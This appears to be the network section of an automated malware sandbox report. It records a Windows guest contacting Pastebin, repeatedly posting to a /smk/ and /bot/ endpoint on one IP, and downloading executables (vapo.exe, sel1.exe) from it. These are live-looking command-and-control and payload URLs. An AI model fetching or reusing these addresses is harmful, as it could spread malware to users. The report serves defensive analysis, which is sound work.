Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| visualstudio.microsoft.com |
CNAME
e19210.b.akamaiedge.net
|
23.49.147.165 |
| pastebin.com | 104.20.4.235 | |
| support.microsoft.com | 13.107.246.74 | |
| windowsupdate.microsoft.com | 20.109.209.108 |
- TCP Requests
-
-
192.168.56.103:49165 121.254.136.107:80
-
192.168.56.103:49168 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49169 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49170 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49171 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49174 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49175 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49179 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49180 13.107.246.74:443support.microsoft.com
-
192.168.56.103:49193 172.67.19.24:443pastebin.com
-
192.168.56.103:49176 18.230.108.113:80
-
192.168.56.103:49181 18.230.108.113:80
-
192.168.56.103:49190 18.230.108.113:80
-
192.168.56.103:49189 20.72.235.82:80windowsupdate.microsoft.com
-
192.168.56.103:49167 23.45.53.206:80
-
192.168.56.103:49172 23.74.20.243:443visualstudio.microsoft.com
-
192.168.56.103:49173 23.74.20.243:443visualstudio.microsoft.com
-
192.168.56.103:49177 23.74.20.243:443visualstudio.microsoft.com
-
192.168.56.103:49178 23.74.20.243:443visualstudio.microsoft.com
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64178 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
200
https://pastebin.com/raw/djZsmRNC
REQUEST
RESPONSE
BODY
GET /raw/djZsmRNC HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:51:17 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 570
Last-Modified: Mon, 27 Jan 2025 07:41:47 GMT
Server: cloudflare
CF-RAY: 9087281be8fffcd0-FUK
GET
200
http://www.bing.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.bing.com
HTTP/1.1 200 OK
Content-Length: 131542
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
X-EventID: 67973aac2d8d4c2aa02a3ba23852f09f
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=9
Date: Mon, 27 Jan 2025 07:50:04 GMT
Connection: keep-alive
Set-Cookie: MUID=2BAA570B3E476BFB3567428A3FF26AA1; domain=.bing.com; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/
Set-Cookie: MUIDB=2BAA570B3E476BFB3567428A3FF26AA1; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=24F8CD0A8D45640C152DD88B8CF06584; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/; HttpOnly
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHUID=V=2&GUID=4D1D55BF35AA4437BEE006E67D9D5233&dmnchg=1; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHUSR=DOB=20250127; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHHPGUSR=SRCHLANG=ko&IG=87B31E54FB904F7582F74907D765829E; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: _SS=SID=24F8CD0A8D45640C152DD88B8CF06584; domain=.bing.com; path=/
X-CDN-TraceID: 0.6788fe79.1737964204.14e5ba3d
GET
302
http://go.microsoft.com/fwlink/?LinkId=249109
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:04 GMT
Connection: keep-alive
GET
302
http://go.microsoft.com/fwlink/?LinkId=249109
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:08 GMT
Connection: keep-alive
GET
302
http://go.microsoft.com/fwlink/?LinkId=133405
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=133405 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://visualstudio.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:12 GMT
Connection: keep-alive
GET
302
http://go.microsoft.com/fwlink/?LinkId=249109
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:15 GMT
Connection: keep-alive
POST
404
http://18.230.108.113/smk/
REQUEST
RESPONSE
BODY
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:19 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1251
GET
302
http://go.microsoft.com/fwlink/?LinkId=133405
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=133405 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://visualstudio.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:22 GMT
Connection: keep-alive
GET
302
http://go.microsoft.com/fwlink/?LinkId=249109
REQUEST
RESPONSE
BODY
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:26 GMT
Connection: keep-alive
POST
404
http://18.230.108.113/smk/
REQUEST
RESPONSE
BODY
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:34 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
GET
200
http://18.230.108.113/vapo.exe
REQUEST
RESPONSE
BODY
GET /vapo.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 18.230.108.113
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:34 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
Last-Modified: Wed, 22 Jan 2025 15:21:16 GMT
ETag: "10000002cbf7b-8200-62c4d0b721e7f"
Accept-Ranges: bytes
Content-Length: 33280
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdownload
POST
404
http://18.230.108.113/smk/
REQUEST
RESPONSE
BODY
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 471
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
POST
404
http://18.230.108.113/smk/
REQUEST
RESPONSE
BODY
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 50
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
GET
200
http://18.230.108.113/files/sel1.exe
REQUEST
RESPONSE
BODY
GET /files/sel1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 18.230.108.113
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
Last-Modified: Wed, 22 Jan 2025 15:48:52 GMT
ETag: "200000031146a-2800-62c4d6e29fb8a"
Accept-Ranges: bytes
Content-Length: 10240
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/x-msdownload
POST
404
http://18.230.108.113/smk/
REQUEST
RESPONSE
BODY
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:36 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 471
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
GET
302
http://windowsupdate.microsoft.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.0
User-Agent: Mozilla/4.0
Host: windowsupdate.microsoft.com
Connection: close
HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://fe2.update.microsoft.com/
Server: Microsoft-IIS/10.0
Date: Mon, 27 Jan 2025 07:50:46 GMT
Connection: close
Content-Length: 155
POST
200
http://18.230.108.113/bot/
REQUEST
RESPONSE
BODY
POST /bot/ HTTP/1.0
User-Agent: Mozilla/4.0
Host: 18.230.108.113
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 26
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:48 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Cache-Control: no-cache
Content-Disposition: attachment; filename=202
Content-Transfer-Encoding: binary
Content-Length: 420356
Connection: close
Content-Type: application/octet-stream
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts